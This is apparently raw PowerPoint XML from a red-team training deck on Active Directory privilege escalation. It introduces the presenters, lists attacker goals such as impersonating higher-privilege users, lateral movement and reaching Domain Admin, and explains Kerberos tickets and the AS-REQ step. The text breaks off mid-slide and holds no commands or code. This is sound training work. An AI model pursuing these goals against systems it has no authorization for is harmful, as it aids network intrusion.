    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="467917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Follow X-Force Red's (@xforcered) latest Tweets / Twitter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE022BF9-3375-910E-F327-9B010870C3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983755" y="697505"/>
            <a:ext cx="2743200" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3168EF52-54ED-3EBF-9CB3-35A877721524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Are We</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66778D69-2DFD-8C64-89D7-86D654B21739}"/>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E81F03C-7372-7FBB-8493-7DBCFA28BB47}"/>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6" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3A0DCA-F117-2C1A-DDBD-C4B3B3CA5957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479071" y="594135"/>
            <a:ext cx="5357831" cy="4125632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>James Rogers - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="054ADA"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@shikata_vx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="054ADA"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="914400">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Internal Network  Methodology Co-Lead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Choi - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="054ADA"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>@_choisec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="054ADA"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="914400">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Internal Network  Methodology Co-Lead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Scott Brink - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="054ADA"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>@_sandw1ch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="914400">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Technical Manager &amp; Internal Network Methodology Lead </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="914400">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Not</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2983821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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>lation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8450" y="655151"/>
            <a:ext cx="8459942" cy="3796620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>GOALS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Situational Awareness – Active Directory </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Compromise or impersonate higher privilege users </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Compromise hosts with higher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> user sessions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain Admin? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Not the only goal </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Lateral movement to other domains/forests -&gt; Priv Esc there </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042699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Escalation &gt; What is Kerberos</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31</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754522"/>
            <a:ext cx="4976815" cy="4062204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A protocol that allows users to authenticate on the network, and access services once authenticated. Providing Single Sign on Functionality.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Terms: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>TGT: Ticket Granting Ticket – TGT's are given to clients once they have finished the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> process. TGT's are used to fetch TGSs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ST: Service Ticket – Used on a per service basis with the TGT to go gain access to SMB, SQL, and other network services. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>TGS: Ticket Granting Service – Service of KDC that issues service ticket based on the TGT.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>KDC: Key Distribution Center – The domain controller.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 7" descr="SANS Digital Forensics and Incident Response Blog | Kerberos in the  Crosshairs: Golden Tickets, Silver Tickets, MITM, and More | SANS Institute">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37833856-C6EC-0CFD-6FA5-BF0744217FD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5307446" y="946619"/>
            <a:ext cx="3655290" cy="3452306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018B32AD-5FD6-2E6C-9760-8D4D158273B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439433" y="4438546"/>
            <a:ext cx="3500998" cy="32983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900" kern="0" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/ - Make Pilkington</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3372A4-75E5-56DC-4E82-9AA10203B414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7977908" y="4095749"/>
            <a:ext cx="1194954" cy="2308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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans ExtraLight"/>
              </a:rPr>
              <a:t>Application Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2755020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Escalation &gt; What is Kerberos</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 7" descr="kerberos-auth-1.drawio(1).png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7843C45B-E48B-4743-AA18-892D8035F928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376737" y="625136"/>
            <a:ext cx="5960295" cy="4079448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 8" descr="kerberos-auth-2.drawio(3).png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE9C365-265E-955E-6688-332A9AB3FFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376737" y="625135"/>
            <a:ext cx="5960295" cy="4053763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 9" descr="kerberos-auth-3.drawio(1).png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C56E81B-6A75-0BD1-D8C1-943945A276DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376736" y="619404"/>
            <a:ext cx="5960295" cy="4079448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415805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Escalation &gt; Kerberos &gt; TGT</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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>33</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940741"/>
            <a:ext cx="4082483" cy="3263850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>User sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>KRB_AS_REQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>to KDC with 2 notable things:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-342900">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Timestamp of the request ENCRYPTED with user's NT hashed password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-342900">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Username </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>KDC will then:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="487680" lvl="2" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>See if it can decrypt the timestamp with the hash of the user’s NT password stored within the NTDS file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="487680" lvl="2" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>If decrypt successful, user has correct credentials. Send back TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6" descr="Kerberos (I): How does Kerberos work? - Theory - Tarlogic Security - Cyber  Security and Ethical hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC1FE20C-11FA-4208-99A6-61D4F27CBE48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387512" y="702338"/>
            <a:ext cx="4399176" cy="1837126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 8" descr="Kerberos (I): How does Kerberos work? - Theory - Tarlogic Security - Cyber  Security and Ethical hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7E861A-AA19-4600-B0CF-3286BCD16643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387028" y="2964396"/>
            <a:ext cx="4396621" cy="1396003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="653896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203875" y="215704"/>
            <a:ext cx="9068753" cy="319943"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>AD Privilege Escalation &gt; Kerberos &gt; TGT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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>34</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32829" y="1037645"/>
            <a:ext cx="4043258" cy="3068210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This TGT contains three parts:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
